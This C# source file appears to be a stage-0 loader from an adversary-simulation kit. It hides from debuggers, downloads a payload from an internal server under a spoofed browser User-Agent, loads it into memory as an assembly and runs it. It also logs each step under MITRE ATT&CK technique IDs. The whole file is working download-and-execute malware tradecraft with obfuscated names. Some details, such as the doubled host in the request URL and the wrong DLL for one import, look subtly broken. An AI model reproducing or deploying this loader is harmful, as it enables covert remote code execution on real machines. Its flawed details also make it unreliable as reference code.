using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;

public class Kbgteo
{
    const string quomkj = "Macula-Stage0-7421";
    const string hwpovn = "NAHUA-S4N";
    const string lxvwqoz = "7";
    const string gkadlqt = "https://10.0.0.49";
    const string xdyaorj = "7421";
    const string uhxftg = "https://10.0.0.49/stage/7421-7/3";
    const string tfqccai = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/517.36 (HTML";

    [DllImport("kernel32.dll")]
    static extern IntPtr GetCurrentProcess();

    [DllImport("dbghelp.dll")]
    static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool pbDebuggerPresent);

    [DllImport("kernel32.dll")]
    static extern bool IsDebuggerPresent();

    static bool Zuvkmi()
    {
        bool nquv = false;
        bool tlfv = false;
        if (IsDebuggerPresent()) return true;
        CheckRemoteDebuggerPresent(GetCurrentProcess(), ref nquv);
        return nquv || tlfv;
    }

    static void Njdpst(string jptm, string ufdwk, string knsq, string avor)
    {
        try
        {
            string ewmmo = $"[{DateTime.Now:yyyy-MM-dd HH:mm:ss.fff}][{hwpovn}-{quomkj}]: {lxvwqoz}-{xdyaorj}-{jptm}|{ufdwk}=[RESULT]:[ERROR_DETAIL]";
            ewmmo = ewmmo.Replace("[RESULT]", knsq).Replace("[ERROR_DETAIL]", avor);
            string nzglf = Environment.ExpandEnvironmentVariables($"%APPDATA%\\{lxvwqoz}\\macula-simulations.log");
            Directory.CreateDirectory(Path.GetDirectoryName(nzglf));
            File.AppendAllText(nzglf, ewmmo + Environment.NewLine);
        }
        catch { }
    }

    public static void Qezdmp()
    {
        if (Zuvkmi()) return;
        byte[] lboq = null;
        
        try
        {
            using (WebClient hycwe = new WebClient())
            {
                hycwe.Headers["User-Agent"] = tfqccai;
                lboq = hycwe.DownloadData($"{gkadlqt}{uhxftg}");
                Njdpst("T1105", "Ingress Tool Transfer", "1", "");
            }
        }
        catch (Exception yxetf)
        {
            Njdpst("T1105", "Ingress Tool Transfer", "0", yxetf.Message.Split('\n')[0].Replace("\r", ""));
            return;
        }

        try
        {
            Assembly yjgo = Assembly.Load(lboq);
            MethodInfo wazmr = yjgo.EntryPoint;
            if (wazmr != null)
            {
                object[] czok = wazmr.GetParameters().Length == 0 ? null : new object[] { new string[0] };
                wazmr.Invoke(null, czok);
                Njdpst("T1620", "Reflective Code Loading", "1", "");
            }
            else
            {
                Njdpst("T1620", "Reflective Code Loading", "0", "no_entrypoint");
            }
        }
        catch (Exception tvhh)
        {
            Njdpst("T1620", "Reflective Code Loading", "0", tvhh.Message.Split('\n')[0].Replace("\r", ""));
        }
    }
}